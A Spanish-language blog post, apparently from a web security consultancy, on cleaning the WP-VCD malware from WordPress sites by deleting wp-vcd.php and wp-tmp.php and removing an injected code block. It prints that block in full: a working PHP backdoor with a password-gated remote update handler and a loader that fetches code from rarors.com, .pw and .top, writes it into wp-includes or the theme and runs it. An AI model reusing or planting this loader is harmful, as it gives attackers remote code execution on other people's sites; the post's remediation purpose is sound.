30 Dic

¿Como desinfectar WP-VCD Malware? Un ataque a WordPress que puedes limpiarlo.

WP-VCD es un malware que es implantado por diferentes motivos, este es un Malware usado por robots diseñados por Hackers que quieren acceder a tu web a traves de ataques automatizados a paginas webs que contienen plataformas wordpress.

Las paginas webs tienen a ser blanco facil a mostrar que usan CMS basados en WordPress, es por esto que es mejor que tomes medidas para mantener seguro tu sitio, pero para ello tienes que estar al tanto de todas las acciones y no solamente instalar de todo porque si.

Si estamos hablando de una pagina web para producción siempre mantén al día todos los módulos actualizables y recuerda también mantener buenas practicas ante la programación de tus módulos pues pueden ser inyectables, para esto se requieren de diferentes buenas practicas para lograrlo, pero puedes conseguirlo mas rápido con auditores especializados en plataformas webs como por ejemplo los consultores de Hexome.

Pero este Malware puedes desinfectar simplemente eliminando algunos archivos:

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. Eliminar un bloque de codigo

Para eliminar esta grilla de codigo es necesario revisar sobre el corchete de primera apertura como se muestra en la imagen

Solved WP-VCD Malware in the WordPress

<?php if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘eb0bab72bef20e75194b481d5dcd2353’)) { $div_code_name=»wp_vcd»; switch ($_REQUEST[‘action’]) { case ‘change_domain’; if (isset($_REQUEST[‘newdomain’])) { if (!empty($_REQUEST[‘newdomain’])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(«http:\/\/(.*)\/code\.php/i’,$file,$matcholddomain)) { $file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file); @file_put_contents(__FILE__, $file); print «true»; } } } } break; case ‘change_code’; if (isset($_REQUEST[‘newcode’])) { if (!empty($_REQUEST[‘newcode’])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all(‘/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i’,$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST[‘newcode’]), $file); @file_put_contents(__FILE__, $file); print «true»; } } } } break; default: print «ERROR_WP_ACTION WP_V_CD WP_CD»; } die(«»); } $div_code_name = «wp_vcd»; $funcfile = __FILE__; if(!function_exists(‘theme_temp_setup’)) { $path = $_SERVER[‘HTTP_HOST’] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), «theme_temp_setup»); $handle = fopen($tmpfname, «w+»); if( fwrite($handle, «<?php\n» . $phpCode)) { } else { $tmpfname = tempnam(‘./’, «theme_temp_setup»); $handle = fopen($tmpfname, «w+»); fwrite($handle, «<?php\n» . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key=’f008cf96406af32ae142ee92de8032e0′; if (($tmpcontent = @file_get_contents(«http://www.rarors.com/code.php») OR $tmpcontent = @file_get_contents_tcurl(«http://www.rarors.com/code.php»)) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent); if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) { @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent); if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) { @file_put_contents(‘wp-tmp.php’, $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(«http://www.rarors.pw/code.php») AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent); if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) { @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent); if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) { @file_put_contents(‘wp-tmp.php’, $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(«http://www.rarors.top/code.php») AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent); if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) { @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent); if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) { @file_put_contents(‘wp-tmp.php’, $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp ?>

http://stackwordpress.com/remove-wp-vcd-malware-attack-wordpress/

Bueno hasta aquí ¿Como desinfectar WP-VCD Malware? Un ataque a WordPress que puedes limpiarlo, por favor dejen sus comentarios, desde ya les agradezco su visita y les invito a recomendarle a otros webmasters o compartirlo con sus colegas de la administración y desarrollo web WordPress.